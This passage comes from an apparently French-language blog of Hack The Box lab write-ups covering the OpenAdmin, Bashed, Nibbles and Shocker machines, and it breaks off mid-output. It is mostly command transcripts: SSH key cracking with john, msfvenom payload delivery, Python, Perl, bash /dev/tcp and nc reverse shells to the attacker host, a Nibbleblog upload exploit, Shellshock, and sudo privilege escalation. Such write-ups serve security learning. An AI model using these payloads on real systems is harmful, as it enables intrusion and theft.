a951c864accfb8476d5643e7926942ddd8f0f32c296662ba659e999b0fb0bbfde7ba2834e5ec931d576e4333d6b5e8960e9de46d32daa5360ce3d0d6b864d3324401c4975485f1aef6ba618edb12d679b0e861fe5549249962d08d25dc2dde517b23cf9a76dcf482530c9a34762f97361dd95352de4c82263cfaa90796c2fa33dd5ce1d889a045d587ef18a5b940a2880e1c706541e2b523572a8836d513f6e688444af86e2ba9ad2ded540deadd9559eb56ac66fe021c3f88c2a1a484d62d602903793d10d ┌──(kali㉿kali)-[~/htb/OpenAdmin] └─$ echo \u0026#39;old_joanna.pem:$sshng$1$16$2AF2......................1a484d62d602903793d10d\u0026#39; \u0026gt; hash.txt ┌──(kali㉿kali)-[~/htb/OpenAdmin] └─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Press \u0026#39;q\u0026#39; or Ctrl-C to abort, almost any other key for status bloodninjas (old_joanna.pem) \u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt; 1g 0:00:00:04 DONE (2025-01-20 08:36) 0.2212g/s 2118Kp/s 2118Kc/s 2118KC/s bloodninjas..bloodmore23 Use the \u0026#34;--show\u0026#34; option to display all of the cracked passwords reliably ## On trouve le mot de passe bloodninjas de JOANNA ","date":"2025-01-20T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/openadmin-htb/","title":"HTB | OpenAdmin"},{"content":" Machine name OS IP Difficulty Bashed Linux 10.10.10.68 Easy Enumeration nmap 1 2 3 4 ┌──(kali㉿kali)-[~] └─$ nmap -sS -sC -sV -An -p- 10.10.10.68 ... 80 -\u0026gt; HTTP : http://bashed.htb Foothold gobuster: found dev/ folder 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 $ gobuster dir -u http://bashed.htb -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://bashed.htb [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /uploads (Status: 301) [Size: 310] [--\u0026gt; http://bashed.htb/uploads/] /php (Status: 301) [Size: 306] [--\u0026gt; http://bashed.htb/php/] /css (Status: 301) [Size: 306] [--\u0026gt; http://bashed.htb/css/] /dev (Status: 301) [Size: 306] [--\u0026gt; http://bashed.htb/dev/] /js (Status: 301) [Size: 305] [--\u0026gt; http://bashed.htb/js/] /fonts (Status: 301) [Size: 308] [--\u0026gt; http://bashed.htb/fonts/] /images (Status: 301) [Size: 309] [--\u0026gt; http://bashed.htb/images/] /server-status (Status: 403) [Size: 298] Progress: 220560 / 220561 (100.00%) =============================================================== Finished =============================================================== phpbash.php: www-data and arrexel user Dans le dossier dev/, on peut executer un script phpbash.php qui donne litteralement une session bash interactive en tant que www-data sur la machine :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 http://bashed.htb/dev/phpbash.php www-data@bashed:/# cd home/ www-data@bashed:/home# ls arrexel scriptmanager www-data@bashed:/home# cd arrexel www-data@bashed:/home/arrexel# ls user.txt www-data@bashed:/home/arrexel# cat user.txt aef2.....8071 Users 1 2 3 4 5 cat /etc/passwd | grep bash root:x:0:0:root:/root:/bin/bash arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash Reverse shell : msfvenom Avec msfvenom, pour s\u0026rsquo;entrainer :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.42 LPORT=1337 -f elf -o test.elf [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 74 bytes Final size of elf file: 194 bytes Saved as: test.elf $ python3 -m http.server 8888 Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ... 10.10.10.68 - - [11/Jan/2025 19:11:27] \u0026#34;GET /test.elf HTTP/1.1\u0026#34; 200 - ------------------------------------------ $ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.42] from (UNKNOWN) [10.10.10.68] 54598 python3 -c \u0026#34;import pty;pty.spawn(\u0026#39;/bin/bash\u0026#39;)\u0026#34; www-data@bashed:/tmp$ export TERM=xterm export TERM=xterm www-data@bashed:/tmp$ ^Z zsh: suspended nc -lnvp 1337 ┌──(kali㉿kali)-[~/htb/Bashed] └─$ stty raw -echo; fg [3] continued nc -lnvp 1337 www-data@bashed:/tmp$ whoami www-data --------------------------------------------- wget 10.10.14.42:8888/test.elf --2025-01-11 16:18:10-- http://10.10.14.42:8888/test.elf Connecting to 10.10.14.42:8888... connected. HTTP request sent, awaiting response... 200 OK Length: 194 [application/octet-stream] Saving to: \u0026#39;test.elf\u0026#39; 0K 100% 40.5M=0s 2025-01-11 16:18:10 (40.5 MB/s) - \u0026#39;test.elf\u0026#39; saved [194/194] www-data@bashed:/tmp# chmod 777 ./test.elf www-data@bashed:/tmp# ls -la test.elf -rwxrwxrwx 1 www-data www-data 194 Jan 11 16:10 test.elf www-data@bashed:/tmp# ./test.elf \u0026amp; www-data -\u0026gt; scriptmanager Enumeration : sudo -l On découvre qu\u0026rsquo;on peut executer n\u0026rsquo;importe quelle commande, en tant que l\u0026rsquo;utilisateur scriptmanager sans mot de passe !\n1 2 3 4 5 6 7 www-data@bashed:/home/arrexel$ sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL shell as scriptmanager On ouvre donc un bash en tant que scriptmanager :\n1 2 3 www-data@bashed:/home/arrexel$ sudo -u scriptmanager /bin/bash scriptmanager@bashed:/home/arrexel$ whoami scriptmanager scriptmanager -\u0026gt; root LinPEAS : /scripts folder Avec linpeas, on découvre un dossier suspect \u0026ldquo;/scripts\u0026rdquo; à la racine, créer par le user scriptmanager.\nOn découvre qu\u0026rsquo;il contient deux fichiers :\n1 2 3 4 scriptmanager@bashed:/scripts$ ls -l total XX -rw-r--r-- 1 scriptmanager scriptmanager 206 Jan 12 14:37 test.py -rw-r--r-- 1 root root 12 Jan 12 13:25 test.txt Dans test.py, on peut voir une commande qui ecrit dans un fichier test.txt une string \u0026ldquo;hello\u0026rdquo;. Ce fichier existe deja, donc le script a été executé auparavant. Comme le fichier semble avoir été crée par root, on déduit que root a executé ce script python. On suppose donc que ce fichier est potentiellement un script de test executé régulièrement par root, dans une crontab. On modifie donc le fichier test.py avec un reverse shell trouvé sur le site reverse shell generator : https://www.revshells.com/\n1 2 3 4 5 6 7 8 9 10 11 12 13 import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\u0026#34;10.10.14.42\u0026#34;,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\u0026#34;sh\u0026#34;) ----------------------------- nc -lnvp 6666 listening on [any] 6666 ... connect to [10.10.14.42] from (UNKNOWN) [10.10.10.68] 42276 ## whoami whoami root ## cat /root/root.txt cat /root/root.txt 4600.....78e4 ","date":"2025-01-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/bashed-htb/","title":"HTB | Bashed"},{"content":" Machine name OS IP Difficulty Nibbles Linux 10.10.10.75 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(kali㉿kali)-[~] └─$ nmap -sS -sC -sV -An -p- -vvv 10.10.10.75 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc= | 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Site doesn\u0026#39;t have a title (text/html). |_http-server-header: Apache/2.4.18 (Ubuntu) | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST Foothold nibbleblog Avec gobuster, on trouve aucun dossier interessant sur le serveur web. Par contre, avec burp on trouve une commentaire indiquant l\u0026rsquo;existante d\u0026rsquo;un dossier \u0026ldquo;nibbleblog\u0026rdquo;\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 23:30:36 GMT Server: Apache/2.4.18 (Ubuntu) Last-Modified: Thu, 28 Dec 2017 20:19:50 GMT ETag: \u0026#34;5d-5616c3cf7fa77-gzip\u0026#34; Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 93 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html \u0026lt;b\u0026gt;Hello world!\u0026lt;/b\u0026gt; \u0026lt;!-- /nibbleblog/ directory. Nothing interesting here! --\u0026gt; admin.php En cherchant un peu, on trouve une page de login \u0026ldquo;admin.php\u0026rdquo; avec une page login. Avec les creds trouvés sur internet on a: user: admin password: nibbles\nOn accède au dashboard de nibbles\nArbitrary File Upload - user flag Sur internet, on trouve uen vuln sur nibbleblog :\nNibbleblog 4.0.3 - Arbitrary File Upload (CVE-2015-6967)\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 python3 exploit.py --url http://nibbles.htb/nibbleblog/ -u admin -p nibbles -x shell.php [+] Login Successful. [+] Upload likely successfull. [+] Exploit launched, check for shell. ----------------------------------------------------------- $ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.42] from (UNKNOWN) [10.10.10.75] 34102 Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 04:01:44 up 9:25, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler) /bin/sh: 0: can\u0026#39;t access tty; job control turned off $ whoami nibbler $ env | grep TERM $ env APACHE_RUN_DIR=/var/run/apache2 APACHE_PID_FILE=/var/run/apache2/apache2.pid PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin APACHE_LOCK_DIR=/var/lock/apache2 LANG=C APACHE_RUN_USER=nibbler APACHE_RUN_GROUP=nibbler APACHE_LOG_DIR=/var/log/apache2 PWD=/ $ cd /home $ ls nibbler $ cd nibbler $ ls personal.zip user.txt $ cat user.txt 962b.....e815 Privilege Escalation personal.zip On trouve dans le /home de nibbler un fichier personal.zip avec un fichier vulnerable monitor.sh qui execute une commande en tant que root\nmonitor.sh On peut executer ce fichier en tant que root.\n1 2 3 4 5 6 7 $ sudo -l Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh Il suffit donc de créer un dossier personal/stuff et d\u0026rsquo;y mettre un script monitor.sh avec un cat /root/root.txt. On peut ensuite l\u0026rsquo;executé avec sudo :\n1 2 3 nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh 4b0a.....a0b8 root shell Pour plus de défi, j\u0026rsquo;ouvre un shell en tant que root. En fait, c\u0026rsquo;était encore plus facile que de faire un cat\u0026hellip;\n1 2 3 4 5 $ sudo ./monitor.sh nibbler@Nibbles:/home/nibbler/personal/stuff# echo \u0026#34;/bin/bash\u0026#34; \u0026gt; monitor.sh nibbler@Nibbles:/home/nibbler/personal/stuff# sudo ./monitor.sh root@Nibbles:/home/nibbler/personal/stuff# whoami root ","date":"2025-01-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/nibbles-htb/","title":"HTB | Nibbles"},{"content":" Machine name OS IP Difficulty Shocker Linux 10.10.10.56 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(kali㉿kali)-[~] └─$ nmap -sS -sC -sV -An -p- -vvv 10.10.10.56 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 05:02 EST PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Site doesn\u0026#39;t have a title (text/html). |_http-server-header: Apache/2.4.18 (Ubuntu) 2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc= | 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). Dirsearch \u0026amp; gobuster Avec dirsearch, on trouve le dossier cgi-bin dont l\u0026rsquo;accès est \u0026ldquo;forbidden\u0026rdquo; mais il existe.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 dirsearch -u http://shocker.htb _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /home/kali/htb/shocker/reports/http_shocker.htb/_25-01-13_07-35-14.txt Target: http://shocker.htb/ [07:35:14] Starting: [07:35:18] 403 - 297B - /.ht_wsr.txt [07:35:18] 403 - 300B - /.htaccess.bak1 [07:35:18] 403 - 300B - /.htaccess.orig [07:35:18] 403 - 302B - /.htaccess.sample [07:35:18] 403 - 300B - /.htaccess.save [07:35:18] 403 - 301B - /.htaccess_extra [07:35:18] 403 - 298B - /.htaccess_sc [07:35:18] 403 - 299B - /.htaccessOLD2 [07:35:18] 403 - 298B - /.htaccessBAK [07:35:18] 403 - 300B - /.htaccess_orig [07:35:18] 403 - 290B - /.htm [07:35:18] 403 - 291B - /.html [07:35:18] 403 - 298B - /.htaccessOLD [07:35:18] 403 - 296B - /.htpasswds [07:35:18] 403 - 300B - /.htpasswd_test [07:35:18] 403 - 297B - /.httr-oauth [07:35:33] 403 - 294B - /cgi-bin/ [07:35:56] 403 - 299B - /server-status [07:35:57] 403 - 300B - /server-status/ Task Completed On peut essayer de trouver des fichiers à l\u0026rsquo;intérieur avec gobuster et l\u0026rsquo;extension -x, qui permet de tester toute la liste avec les extensions précisées. Ici, on teste les fichiers dans le dossier cgi-bin avec les extensions \u0026ldquo;sh\u0026rdquo;, \u0026ldquo;bin\u0026rdquo;, et \u0026ldquo;cgi\u0026rdquo;.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 $ gobuster dir -u http://shocker.htb/cgi-bin -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sh,pl,bin,cgi =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://shocker.htb/cgi-bin [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: sh,bin,cgi [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /user.sh (Status: 200) [Size: 118] Progress: 10557 / 882244 (1.20%)^C [!] Keyboard interrupt detected, terminating. Progress: 11293 / 882244 (1.28%) =============================================================== Finished =============================================================== Bingo ! On trouve un script user.sh.\nFoothold Shellshock Grâce au nom de la machine \u0026ldquo;shocker\u0026rdquo; et quelques recherches sur le web, on trouve la vulnérabilité \u0026ldquo;shellshock\u0026rdquo; qui permet d\u0026rsquo;executer du code arbitraire grâce aux fichiers présents dans le dossier cgi-bin. On trouve un github permettant de l\u0026rsquo;exploiter:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 $ python2 shocker.py --Host=shocker.htb --cgi /cgi-bin/user.sh --command whoami .-. . . ( )| | `-. |--. .-. .-.|.-. .-. .--. ( )| |( )( |-.\u0026#39;(.-\u0026#39; | `-\u0026#39; \u0026#39; `-`-\u0026#39; `-\u0026#39;\u0026#39; `-`--\u0026#39;\u0026#39; v1.1 Tom Watson, tom.watson@nccgroup.trust https://www.github.com/nccgroup/shocker Released under the GNU Affero General Public License (https://www.gnu.org/licenses/agpl-3.0.html) [+] Single target \u0026#39;/cgi-bin/user.sh\u0026#39; being used [+] Checking connectivity with target... [+] Target was reachable [+] Looking for vulnerabilities on shocker.htb:80 [+] 1 potential target found, attempting exploits [+] The following URLs appear to be exploitable: [1] http://shocker.htb:80/cgi-bin/user.sh [+] Would you like to exploit further? [\u0026gt;] Enter an URL number or 0 to exit: ls [+] The following URLs appear to be exploitable: [1] http://shocker.htb:80/cgi-bin/user.sh [+] Would you like to exploit further? [\u0026gt;] Enter an URL number or 0 to exit: 1 [+] Entering interactive mode for http://shocker.htb:80/cgi-bin/user.sh [+] Enter commands (e.g. /bin/cat /etc/passwd) or \u0026#39;quit\u0026#39; \u0026gt; whoami \u0026gt; No response \u0026gt; id \u0026gt; No response \u0026gt; /bin/id \u0026gt; No response \u0026gt; /bin/cat /etc/passwd \u0026lt; root:x:0:0:root:/root:/bin/bash \u0026lt; daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin \u0026lt; bin:x:2:2:bin:/bin:/usr/sbin/nologin \u0026lt; sys:x:3:3:sys:/dev:/usr/sbin/nologin \u0026lt; sync:x:4:65534:sync:/bin:/bin/sync \u0026lt; games:x:5:60:games:/usr/games:/usr/sbin/nologin \u0026lt; man:x:6:12:man:/var/cache/man:/usr/sbin/nologin \u0026lt; lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin \u0026lt; mail:x:8:8:mail:/var/mail:/usr/sbin/nologin \u0026lt; news:x:9:9:news:/var/spool/news:/usr/sbin/nologin \u0026lt; uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin \u0026lt; proxy:x:13:13:proxy:/bin:/usr/sbin/nologin \u0026lt; www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin \u0026lt; backup:x:34:34:backup:/var/backups:/usr/sbin/nologin \u0026lt; list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin \u0026lt; irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin \u0026lt; gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin \u0026lt; nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin \u0026lt; systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false \u0026lt; systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false \u0026lt; systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false \u0026lt; systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false \u0026lt; syslog:x:104:108::/home/syslog:/bin/false \u0026lt; _apt:x:105:65534::/nonexistent:/bin/false \u0026lt; lxd:x:106:65534::/var/lib/lxd/:/bin/false \u0026lt; messagebus:x:107:111::/var/run/dbus:/bin/false \u0026lt; uuidd:x:108:112::/run/uuidd:/bin/false \u0026lt; dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false \u0026lt; sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin \u0026lt; shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash \u0026gt; sh -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.42/6666 0\u0026gt;\u0026amp;1 \u0026gt; No response \u0026gt; sh -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.42/6666 0\u0026gt;\u0026amp;1 \u0026gt; No response \u0026gt; python3 --version \u0026gt; No response \u0026gt; python3 --version \u0026gt;\u0026amp; /dev/tcp/10.10.14.42/6666 0\u0026gt;\u0026amp;1 \u0026gt; No response \u0026gt; python3 --version \u0026gt;\u0026amp; /dev/tcp/10.10.14.42/6666 0\u0026gt;\u0026amp;1 \u0026gt; No response \u0026gt; nc 10.10.14.42 6666 -e sh \u0026gt; No response \u0026gt; locate nc \u0026gt; No response \u0026gt; /bin/cat /home/*/user.txt \u0026lt; c4bf.....3bf6 \u0026gt; Shell as shelly 1 2 3 4 5 6 7 8 9 10 11 12 13 14 .... \u0026gt; /bin/bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.42/6666 0\u0026gt;\u0026amp;1 \u0026gt; No response \u0026gt; -------------------------- $ nc -lnvp 6666 listening on [any] 6666 ... connect to [10.10.14.42] from (UNKNOWN) [10.10.10.56] 40886 bash: no job control in this shell shelly@Shocker:/usr/lib/cgi-bin$ whoami whoami shelly Privilege Escalation Enumeration On peut executer n\u0026rsquo;importe quel script perl en tant que root\u0026hellip; J\u0026rsquo;ai donc récupérer un reverse shell en perl et je l\u0026rsquo;ai executé.\n1 2 3 4 5 6 7 shelly@Shocker:/tmp$ sudo -l Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl Perl as root 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 shelly@Shocker:/tmp$ cat root.pl use Socket;$i=\u0026#34;10.10.14.42\u0026#34;;$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\u0026#34;tcp\u0026#34;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\u0026#34;\u0026gt;\u0026amp;S\u0026#34;);open(STDOUT,\u0026#34;\u0026gt;\u0026amp;S\u0026#34;);open(STDERR,\u0026#34;\u0026gt;\u0026amp;S\u0026#34;);exec(\u0026#34;sh -i\u0026#34;);}; shelly@Shocker:/tmp$ sudo /usr/bin/perl root.pl ------------------------------------------------------------ $ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.42] from (UNKNOWN) [10.10.10.56] 59474 ## whoami root ## python3 -c \u0026#34;import pty;pty.spawn(\u0026#39;/bin/bash\u0026#39;)\u0026#34; root@Shocker:/tmp# export TERM=xterm export TERM=xterm root@Shocker:/tmp# ^Z zsh: suspended nc -lnvp 1337 ┌──(kali㉿kali)-[~/htb/shocker/shocker] └─$ stty raw -echo; fg [1] + continued nc -lnvp 1337 root@Shocker:/tmp# root@Shocker:/tmp# whoami root root@Shocker:/tmp# cd /root root@Shocker:~# ls root.txt root@Shocker:~# cat root.txt adcd.....c16c Bonus Enumeration shellshock vuln with nmap script 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 ┌──(kali㉿kali)-[~/htb/shocker] └─$ locate nse | grep shellshock /usr/share/nmap/scripts/http-shellshock.nse ┌──(kali㉿kali)-[~/htb/shocker] └─$ cat /usr/share/nmap/scripts/http-shellshock.nse | grep nmap -- nmap -sV -p- --script http-shellshock \u0026lt;target\u0026gt; -- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls \u0026lt;target\u0026gt; license = \u0026#34;Same as Nmap--See https://nmap.org/book/man-legal.html\u0026#34; ┌──(kali㉿kali)-[~/htb/shocker] └─$ nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls shocker.htb Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 08:33 EST Nmap scan report for shocker.htb (10.10.10.56) Host is up (0.019s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) | http-shellshock: | VULNERABLE: | HTTP Shellshock vulnerability | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2014-6271 | This web application might be affected by the vulnerability known | as Shellshock. It seems the server is executing commands injected | via malicious HTTP headers. | | Disclosure date: 2014-09-24 | Exploit results: | \u0026lt;!DOCTYPE HTML PUBLIC \u0026#34;-//IETF//DTD HTML 2.0//EN\u0026#34;\u0026gt; | \u0026lt;html\u0026gt;\u0026lt;head\u0026gt; | \u0026lt;title\u0026gt;500 Internal Server Error\u0026lt;/title\u0026gt; | \u0026lt;/head\u0026gt;\u0026lt;body\u0026gt; | \u0026lt;h1\u0026gt;Internal Server Error\u0026lt;/h1\u0026gt; | \u0026lt;p\u0026gt;The server encountered an internal error or | misconfiguration and was unable to complete | your request.\u0026lt;/p\u0026gt; | \u0026lt;p\u0026gt;Please contact the server administrator at | webmaster@localhost to inform them of the time this error occurred, | and the actions you performed just before this error.\u0026lt;/p\u0026gt; | 